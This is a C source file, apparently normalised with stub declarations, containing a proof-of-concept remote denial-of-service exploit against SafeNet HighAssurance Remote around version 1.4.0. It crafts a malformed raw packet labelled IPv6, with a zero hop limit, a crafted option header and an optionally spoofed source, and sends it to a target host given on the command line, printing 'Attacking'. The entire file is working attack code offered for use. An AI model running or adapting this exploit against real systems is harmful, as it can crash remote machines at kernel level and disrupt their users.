
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_4__ TYPE_2__ ;
typedef struct TYPE_3__ TYPE_1__ ;


typedef void* u_int32_t ;
typedef int u_char ;
struct opt {int nxt_hdr; int opt_len; } ;
struct TYPE_4__ {void* s_addr; } ;
struct TYPE_3__ {void* s_addr; } ;
struct ip {int ip_v; TYPE_2__ ip_dst; TYPE_1__ ip_src; scalar_t__ ip_sum; scalar_t__ ip_p; scalar_t__ ip_ttl; void* ip_off; void* ip_id; void* ip_len; scalar_t__ ip_tos; scalar_t__ ip_hl; } ;
typedef int libnet_t ;


 int EXIT_FAILURE ;
 int EXIT_SUCCESS ;
 int IPV6_HDR_LEN ;
 int LIBNET_ERRBUF_SIZE ;
 int LIBNET_RAW4_ADV ;
 int UDP_LEN ;
 int exit (int) ;
 int fprintf (int ,char*,char*) ;
 void* htons (int) ;
 int * libnet_init (int ,char*,char*) ;
 int libnet_write_raw_ipv4 (int *,int *,int) ;
 void* lookup (char*) ;
 int * malloc (int) ;
 int memset (int *,int ,int) ;
 int perror (char*) ;
 int printf (char*,...) ;
 int stderr ;

int
main (int argc, char **argv)
{
  u_char *buf = ((void*)0);


  char errbuf[LIBNET_ERRBUF_SIZE];
  libnet_t *lnsock;
  char *device = ((void*)0);


  struct ip *ip_hdr = ((void*)0);
  struct opt *opt_hdr = ((void*)0);
  u_int32_t src_ip = 0, dst_ip = 0;

  printf ("SafeNet HighAssurance Remote ~1.4.0 Ring0 DoS POC\n"
          "by John Anderson <john@ev6.net>\n"
          "   mu-b <mu-b@digit-labs.org>\n\n");

  if (!argv[1])
    {
      printf ("Usage: %s <destination> [source]\n", argv[0]);
      exit (EXIT_FAILURE);
    }


  if ((buf = malloc (IPV6_HDR_LEN + UDP_LEN)) == ((void*)0))
    {
      perror ("malloc: ");
      exit (EXIT_FAILURE);
    }


  lnsock = libnet_init (LIBNET_RAW4_ADV, device, errbuf);
  if (lnsock == ((void*)0))
    {
      fprintf (stderr, "libnet_init() failed: %s", errbuf);
      exit (-1);
    }

  if (!argv[2])
    src_ip = lookup ("127.0.0.1");
  else
    src_ip = lookup (argv[2]);

  dst_ip = lookup (argv[1]);


  memset (buf, 0, sizeof buf);
  ip_hdr = (struct ip *) buf;
  ip_hdr->ip_v = 6;
  ip_hdr->ip_hl = 0;
  ip_hdr->ip_tos = 0;
  ip_hdr->ip_len = htons (IPV6_HDR_LEN + UDP_LEN);
  ip_hdr->ip_id = htons (0);
  ip_hdr->ip_off = htons (0);
  ip_hdr->ip_ttl = 0;
  ip_hdr->ip_p = 0;
  ip_hdr->ip_sum = 0;
  ip_hdr->ip_src.s_addr = src_ip;
  ip_hdr->ip_dst.s_addr = dst_ip;


  opt_hdr = (struct opt *) (buf + IPV6_HDR_LEN);
  opt_hdr->nxt_hdr = 0x3C;
  opt_hdr->opt_len = 0x07;





  printf ("Attacking %s", argv[1]);
  libnet_write_raw_ipv4 (lnsock, buf, IPV6_HDR_LEN + UDP_LEN);
  printf (".\n");

  return (EXIT_SUCCESS);
}
